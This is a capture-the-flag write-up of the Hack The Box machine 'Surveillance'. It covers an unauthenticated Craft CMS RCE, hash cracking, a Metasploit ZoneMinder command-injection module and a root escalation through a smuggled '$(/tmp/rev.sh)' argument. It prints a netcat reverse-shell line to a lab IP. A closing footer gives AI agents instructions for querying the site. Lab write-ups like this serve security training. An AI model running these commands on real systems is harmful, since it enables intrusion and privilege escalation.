# Surveillance

{% embed url="<https://app.hackthebox.com/machines/Surveillance>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

We start with a Nmap scan and only have two open ports: 22 with SSH and a web server on port 80.

<figure><img src="/files/TTpZfltPvCbl2rNBI9R6" alt=""><figcaption></figcaption></figure>

When enumerating the directories, we have no direct incidents except for the `/admin` directory.

<figure><img src="/files/ebF3cCgoagjrwGG2RaES" alt=""><figcaption></figcaption></figure>

The main site has nothing else to offer us in the way of entry points.

<figure><img src="/files/J3AyvUPOrmWReEWQwV75" alt=""><figcaption></figcaption></figure>

When we look at the `/admin` page, we see that we are dealing with the `craft cms`.

<figure><img src="/files/FphiftWrqUulaJA3aPtu" alt=""><figcaption></figcaption></figure>

When looking through the source of the index page, we see that we are dealing with craft cms in the  version `4.4.14`.

<figure><img src="/files/ghyvcgU3JPZWEXSHASIa" alt=""><figcaption></figcaption></figure>

We can get an idea of the CMS on GitHub:

{% embed url="<https://github.com/craftcms/cms/tree/4.4.14>" %}

And we seem to be dealing with a very old version. We probably have an entry point into the system after all. Let's take a look at what vulnerabilities there are.

<figure><img src="/files/eQv86CVRdUSnPCeUiCVW" alt=""><figcaption></figcaption></figure>

## Shell as www-data

{% embed url="<https://blog.calif.io/p/craftcms-rce>" %}

The Crafty CMS version has an unauthenticated remote code execution vulnerability - `CVE-2023-41892`.

<figure><img src="/files/3kUlrVwx4DDRPgCM3ALk" alt=""><figcaption></figcaption></figure>

The following gist shows us a POC. Which, unfortunately, did not work right away:

{% embed url="<https://gist.github.com/gmh5225/8fad5f02c2cf0334249614eb80cbf4ce>" %}

Looking at the documentation of `craft cms` the exploit does not consider the resource base path. This we have to edit in the POC.

<figure><img src="/files/ewEEoAqJ2NU9zD1Jggsl" alt=""><figcaption></figcaption></figure>

We make the following adjustments:

<figure><img src="/files/O6brIpaKM1F9uY6tauVa" alt=""><figcaption></figcaption></figure>

Furthermore, the query for uploading seems to be defective.

<figure><img src="/files/y6CRfrcD6ssW5j1VnML5" alt=""><figcaption></figcaption></figure>

After customizing and executing the POC, we receive a web shell that we can conveniently use in the terminal. We are the user `www-data`. However, for the time being, we cannot find a flag in his home directory.

<figure><img src="/files/6GeZUEHRRcYuRkgAdvin" alt=""><figcaption></figcaption></figure>

Next, we upgrade our web shell to an interactive shell. We use `revshells.com` to generate a reverse shell payload.

<figure><img src="/files/CeiLEpy37zmK29FOZqvQ" alt=""><figcaption></figcaption></figure>

After our reversehll connects...

<figure><img src="/files/lMalFcL94eXv5FVyVQRo" alt=""><figcaption></figcaption></figure>

... we upgrade the reverse shell:

{% embed url="<https://0xffsec.com/handbook/shells/full-tty/>" %}

<figure><img src="/files/pcP5WfPFxKWZI50Pvv6Q" alt=""><figcaption></figcaption></figure>

In addition to `www-data`, we also have the users `matthew` and `zoneminder`. Since we can't find a user flag as `www-data` we have to move laterally and get access to one of these users.

<figure><img src="/files/zjbtxieqiv5D9EsRMqbt" alt=""><figcaption></figcaption></figure>

## Shell as matthew

In `/html/craft/storage/backup`, we find a backup of a database, packed as a zip. This could contain sensitive information that could allow us to switch to one of the other users. We unpack the zip.

```
unzip surveillance--2023-10-17-202801--v4.4.14.sql.zip
```

<figure><img src="/files/AlQIXXiVsZFFxIATFDQG" alt=""><figcaption></figcaption></figure>

And search the file using strings and grep. We find what we are looking for when we search for admin. This reveals the password hash (SHA2-256) for `matthew`.&#x20;

```
strings surveillance--2023-10-17-202801--v4.4.14.sql.zip | grep admin
```

<figure><img src="/files/0Nbk1gBsphNoDk7Tt7hZ" alt=""><figcaption></figcaption></figure>

Using Hashcat, we crack the hash with the `1400` mode for SHA2-256.

<figure><img src="/files/kkqJZAfdLoVdxdtX8JLc" alt=""><figcaption></figcaption></figure>

Next, via SSH, we can now log in with `matthew`'s credentials and find the user flag in the user's home directory.

<figure><img src="/files/1a26eKgaWr1z9RqI8rR4" alt=""><figcaption></figcaption></figure>

Linpeas reveals the installation of ZoneMinder. ZoneMinder is an open-source video surveillance software designed for monitoring and recording security cameras. It offers features such as motion detection, alerts, and remote access, allowing users to manage their security systems via a web interface or mobile app.

<figure><img src="/files/Tq0Ll93qUWhy5BwXpEmg" alt=""><figcaption></figcaption></figure>

When searching for files via ZoneMinder we discovered that it was installed via dpkg. We can therefore determine what version it is.

<figure><img src="/files/1w9lQfoyLx1wvqVbKvbX" alt=""><figcaption></figcaption></figure>

Using `dpkg -s zoneminder | grep Verison` we get the Verison `1.36.32`. And find many vulnerabilities. Among them Command Injection. We will probably jump from matthew to zoneminder.

<figure><img src="/files/VI67TCBY8iEKSfTk2Qhu" alt=""><figcaption></figcaption></figure>

{% embed url="<https://www.cybersecurity-help.cz/vdb/SB2023030118>" %}

<figure><img src="/files/tgrHnt68BY1zT4vWh9T0" alt=""><figcaption></figcaption></figure>

## Shell as zoneminder

We start `msfconsole` and look around for possible exploits. Among them, we find `exploit/unix/webapp/zoneminder_snapshots` with command injection. We want to try this out. But we need access to the web interface. Maybe the instance is running internally.

<figure><img src="/files/kYEHgw4d15oxwozaJ3QR" alt=""><figcaption></figcaption></figure>

We run `netstat -tulnp` on the target and see that something is running on port 8000.

<figure><img src="/files/uaFS7S7ZTMRcnr0C5Ymf" alt=""><figcaption></figcaption></figure>

We forward the port via SSH.

<figure><img src="/files/oYluKUTy5OM7vmek4xJm" alt=""><figcaption></figcaption></figure>

And lo and behold it is the zoneminder interface, we should now be able to get a reverse shell as `zoneminder` using msfconsole. Assuming that the webserivce is running under the user `zoneminder`.

<figure><img src="/files/GfJ2QRz4S6Ou6IUeZ4wi" alt=""><figcaption></figcaption></figure>

We setup the options in msfconsole.

```
msf6 > use exploit/unix/webapp/zoneminder_snapshots
msf6 exploit(unix/webapp/zoneminder_snapshots) > set RHOSTS 127.0.0.1
msf6 exploit(unix/webapp/zoneminder_snapshots) > set RPORT 8000
msf6 exploit(unix/webapp/zoneminder_snapshots) > set LHOST 10.10.14.122
msf6 exploit(unix/webapp/zoneminder_snapshots) > set LPORT 4444
msf6 exploit(unix/webapp/zoneminder_snapshots) > set targeturi /
msf6 exploit(unix/webapp/zoneminder_snapshots) > run
```

After running the exploit, we get a meterpreter session. Spawning a shell reveals to us that we are indeed the user `zoneminder`.

<figure><img src="/files/i0Wwx7ciTkghnttwVNLq" alt=""><figcaption></figcaption></figure>

## Shell as root

When running `sudo -l` we see that we can run all applications from `/bin` starting with `zm` and ending with `.pl` without a password. Furthermore, we can pass everything we want to the program.&#x20;

Here we could try command injection via command subsitution. We familiarize ourselves with zmupdate and see that we can also specify the user parameter. The `--user` switch is basically used to specify the user in the variable of the script. Placing the command substition inside the users variable in the script, leads to executing that command first when the script reaches that point of evaluating the user.

It is important that we specify the parameter as a string, because `'$()'` is not recognized as a substituted command by the shell. Otherwise the substition will not be executed in the script but in the context of the command we enter, because the shell. Then we would get a reverse shell as `zoneminder` and not as `root`.

<figure><img src="/files/yPAk9VIdcuzTc5JncL7f" alt=""><figcaption></figcaption></figure>

We prepare our reverse shell and set up a listener.

```
echo 'busybox nc 10.10.14.122 4446 -e sh' > /tmp/rev.sh
chmod +x /tmp/rev.sh
```

<figure><img src="/files/agBhJqEMhAcntDPF8lUU" alt=""><figcaption></figcaption></figure>

After running `sudo /usr/bin/zmupdate.pl --version 1.37 --user='$(/tmp/rev.sh)'` our reverse shell connects and we are the user `root`. In the home directory of the user we find the final flag.

<figure><img src="/files/DhYacihvEIiANthrYOTI" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xb0b.gitbook.io/writeups/hackthebox/2024/surveillance.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.